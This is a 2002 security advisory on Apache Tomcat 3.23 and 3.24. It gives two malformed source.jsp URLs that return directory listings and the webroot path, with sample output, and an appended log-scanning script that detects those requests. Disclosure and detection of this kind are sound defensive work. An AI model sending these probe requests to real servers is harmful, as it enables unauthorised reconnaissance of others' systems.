Vulnerability in Apache Tomcat v3.23 & v3.24

From: webmaster@procheckup.com
Date: 05/29/02


Date: 29 May 2002 13:31:27 -0000
From: <webmaster@procheckup.com>
To: bugtraq@securityfocus.com



Procheckup Ltd
www.procheckup.com

Procheckup Security Bulletin PR02-05

           
  Description: Tomcat source.jsp directory listing and webroot location display
         Date: 8/1/2002

  Application: Apache Tomcat Java server versions 3.23 and 3.24
     Platform: Linux/Unix
     Severity: Remote attackers can obtain listings of web directories and sometimes the location of webroot
      Authors: Richard Brain [richard.brain@procheckup.com]
Vendor Status:
CVE Candidate: Not assigned
    Reference: www.procheckup.com/security_info/vuln.html

 Description:

Tomcat is the free open-source Java server,
http://jakarta.apache.org/tomcat/.

Normally source.jsp is used to look at the source code of
programs within the examples directories. A typical
request is

http://webserver:80/examples/jsp/source.jsp?/jsp/num/numguess.jsp

We have found that calling source.jsp with malformed input
displays a directory listing and sometimes discloses the
location of the webroot.

The vulnerabilities may only work on port 8080 rather than
port 80, depending on how the webserver has been configured
with Tomcat.

Exploits

A) Requesting the following URL:

http://webserver:80/examples/jsp/source.jsp??

This gives the directory listing and webroot on 3.23; 3.24 just
gives a directory listing.

<title>Directory Listing</title>
<base href="file://localhost/"WEBROOT"/webapps/examples/"><h1>/"WEBROOT"/webapps/examples</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif"
width=32 height=32>
<a href="images">images</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="jsp">jsp</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="META-INF">META-INF</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="servlets">servlets</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="WEB-INF">WEB-INF</a><br>

B) Requesting the following URL:

http://webserver:80/examples/jsp/source.jsp?/jsp/

This gives the directory listing and webroot on 3.23; 3.24 just
gives a directory listing of a subdirectory.

<title>Directory Listing</title>
<base href="file://localhost/"WEBROOT"/webapps/examples/jsp/"><h1>/"WEBROOT"/webapps/examples/jsp</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif"
width=32 height=32>
<a href="cal">cal</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="checkbox">checkbox</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="colors">colors</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="dates">dates</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="error">error</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="forward">forward</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="include">include</a><br><img align=middle
src="doc:/lib/images/ftp/file.gif" width=32 height=32>
<a href="index.html">index.html</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="jsptoserv">jsptoserv</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="num">num</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="plugin">plugin</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="security">security</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="sessions">sessions</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="simpletag">simpletag</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="snp">snp</a><br><img align=middle
src="doc:/lib/images/ftp/file.gif" width=32 height=32>
<a href="source.jsp">source.jsp</a><br>

   Solution:
  Delete the samples directory if not needed.

      Legal:

  Copyright 2002 Procheckup Ltd. All rights reserved.

  Permission is granted for copying and circulating this Bulletin
  to the Internet community for the purpose of alerting them to
  problems, if and only if, the Bulletin is not edited or changed
  in any way, is attributed to Procheckup, and provided such
  reproduction and/or distribution is performed for non-commercial
  purposes.

  Any other use of this information is prohibited. Procheckup is
  not liable for any misuse of this information by any third party.
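
For administrators checking whether the two request shapes described in this bulletin have reached a server, the following is an added example, not part of the Procheckup bulletin. It assumes Common Log Format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def classify_target(target):
    """Return None (not source.jsp), 'file' (normal use: the query names a
    file) or 'listing' (one of the two request shapes in the bulletin)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/source.jsp"):
        return None
    query = unquote(parts.query)       # normalise percent-encoding (assumption)
    if query and set(query) == {"?"}:  # case A: source.jsp??
        return "listing"
    if query.endswith("/"):            # case B: source.jsp?/jsp/ (a directory)
        return "listing"
    return "file"

def find_listing_requests(log_lines):
    """Return (host, target, status) for every request matching case A or B."""
    hits = []
    for line in log_lines:
        m = CLF.match(line)
        if m and classify_target(m["target"]) == "listing":
            hits.append((m["host"], m["target"], int(m["status"])))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/May/2002:13:31:27 +0000] '
    '"GET /examples/jsp/source.jsp?/jsp/num/numguess.jsp HTTP/1.0" 200 2211',
    '198.51.100.7 - - [29/May/2002:13:32:02 +0000] '
    '"GET /examples/jsp/source.jsp?? HTTP/1.0" 200 913',
    '198.51.100.7 - - [29/May/2002:13:32:05 +0000] '
    '"GET /examples/jsp/source.jsp?/jsp/ HTTP/1.0" 200 2840',
    '192.0.2.10 - - [29/May/2002:13:33:40 +0000] "GET /index.html HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for host, target, status in find_listing_requests(SAMPLE_LOG):
        print(f"{host} requested {target} (HTTP {status})")
```

A hit with status 200 means the server answered the request; once the samples directory is deleted as the Solution advises, the same requests should no longer return 200.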


